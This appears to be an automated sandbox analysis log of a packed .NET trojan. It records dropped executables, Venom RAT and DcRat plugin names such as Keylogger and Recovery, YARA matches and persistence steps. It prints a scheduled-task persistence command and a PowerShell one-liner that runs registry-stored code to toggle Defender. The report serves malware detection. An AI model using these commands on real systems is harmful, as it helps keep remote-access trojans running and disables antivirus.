Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\whoami.exe Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe Section loaded: netutils.dll
Source: C:\Windows\System32\whoami.exe Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe Section loaded: netutils.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: atlthunk.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: securityhealthsso.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: wldp.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: atlthunk.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: securityhealthsso.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe Section loaded: wldp.dll
Source: C:\Windows\System32\net1.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: %costura.messagepacklib.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: costura.costura.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Keylogger.pdb source: Loader.exe, 00000014.00000002.2813392889.000000001CC40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: tion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb`- source: WER3812.tmp.dmp.30.dr
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3812.tmp.dmp.30.dr
Source: Binary string: WinDefend.pdb source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000000.2004261528.0000000000BEC000.00000002.00000001.01000000.00000008.sdmp, WinDefend.exe.0.dr
Source: Binary string: lib.pdbX source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source: Binary string: 0C:\Windows\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: SendMemory.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Core.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb^ source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Keylogger.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000002F.00000002.3065403253.0000029A21DC5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Recovery.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Dynamic.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: MessagePackLib.pdbzZ) source: WER3812.tmp.dmp.30.dr
Source: Binary string: mscorlib.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: SendMemory.pdb g source: WER3812.tmp.dmp.30.dr
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Logger.pdb source: Loader.exe, 00000014.00000002.2746255140.000000001B4A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdb Operatin source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbP source: WER3812.tmp.dmp.30.dr
Source: Binary string: Extra.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER3812.tmp.dmp.30.dr
Source: Binary string: symbols\dll\mscorlib.pdbpdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: Loader.exe, 00000014.00000002.2812581762.000000001CA40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Extra.pdb` source: WER3812.tmp.dmp.30.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Xml.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: lib.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: Loader.exe, 00000014.00000002.2744256904.000000001B430000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: Loaader.exe, 00000015.00000002.3394522285.0000000013094000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3269125954.00000000014A0000.00000004.08000000.00040000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Configuration.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Xml.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Windows.Forms.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: C:\Users\Ninja\Downloads\dcrat_fix-master\dcrat_fix-master\MessagePack\bin\Release\MessagePackLib.pdb source: Loaader.exe, 00000015.00000002.3552953263.000000001CB50000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: costura.dotnetzip.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb@ source: WER3812.tmp.dmp.30.dr
Source: Binary string: costura.polly.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Drawing.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Management.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Management.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Core.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: MessagePackLib.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: ion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: orlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: n.pdb; source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Extra.pdb source: Loader.exe, 00000014.00000002.2744918575.000000001B440000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: Client.exe.0.dr, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])
Source: Loaader.exe, 00000015.00000002.3279406643.0000000002F00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: dotNetProtector
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
Source: Yara match File source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: WinDefend.exe.0.dr Static PE information: 0xCB2C3ED5 [Thu Jan 6 06:01:57 2078 UTC]
Source: WinDefend.exe.0.dr Static PE information: section name: %q2hF6
Source: WinDefend.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Code function: 0_2_00007FF848F200BD pushad ; iretd 0_2_00007FF848F200C1
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 2_2_00007FF848F000BD pushad ; iretd 2_2_00007FF848F000C1
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Code function: 3_2_00007FF848F100BD pushad ; iretd 3_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF53CF push edx; iretd 4_2_02CF53D2
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF53AF push ecx; iretd 4_2_02CF53B6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF53AB push ecx; iretd 4_2_02CF53AE
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF16DF push cs; iretd 4_2_02CF16E6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF16B3 push cs; iretd 4_2_02CF16BA
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF1641 push ss; iretd 4_2_02CF1642
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF545B push ebx; iretd 4_2_02CF5462
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF546B push edx; iretd 4_2_02CF546E
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF541F push eax; iretd 4_2_02CF5426
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF25BF push ds; iretd 4_2_02CF25C6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 4_2_02CF2577 push ds; iretd 4_2_02CF2586
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 18_2_00007FF848F400BD pushad ; iretd 18_2_00007FF848F400C1
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 19_2_00007FF848F100BD pushad ; iretd 19_2_00007FF848F100C1
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F4792B push ebx; retf 20_2_00007FF848F4796A
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F4614A pushfd ; ret 20_2_00007FF848F46191
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F48167 push ebx; ret 20_2_00007FF848F4816A
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F46192 push edi; ret 20_2_00007FF848F461D6
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F43C10 push esi; retf 5F4Ah 20_2_00007FF848F55AD7
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F47C5E push eax; retf 20_2_00007FF848F47C6D
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F47BCE pushad ; retf 20_2_00007FF848F47C5D
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F300BD pushad ; iretd 20_2_00007FF848F300C1
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF849121A34 push ss; iretd 20_2_00007FF849121A38
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 21_2_00007FF848F0EEF5 pushad ; retf 21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 21_2_00007FF848F15587 push ecx; iretd 21_2_00007FF848F155DC
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 21_2_00007FF848F0F020 pushad ; retf 21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 21_2_00007FF848F000BD pushad ; iretd 21_2_00007FF848F000C1
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 21_2_00007FF848F0EF70 pushad ; retf 21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 21_2_00007FF848F0EF98 pushad ; retf 21_2_00007FF848F0F149
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Static PE information: section name: .text entropy: 7.992585946584666
Source: WinDefend.exe.0.dr Static PE information: section name: %q2hF6 entropy: 7.9947379715100375
Source: C:\Users\user\AppData\Local\Temp\Client.exe File created: C:\Users\user\AppData\Roaming\Loader.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe File created: C:\Users\user\AppData\Local\Temp\Infected.exe
Source: C:\Users\user\AppData\Local\Temp\Infected.exe File created: C:\Users\user\AppData\Roaming\Loaader.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe File created: C:\Users\user\AppData\Local\Temp\WinDefend.exe

Boot Survival

Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED
Source: Yara match File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: unknown Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YourAppName
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
Source: C:\Users\user\AppData\Roaming\Loader.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Loaader.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Loader.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1 D179E1D3E1F46C85BB4A03E9C9069E8B529999E776B7B12C2D4A47F622535F8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
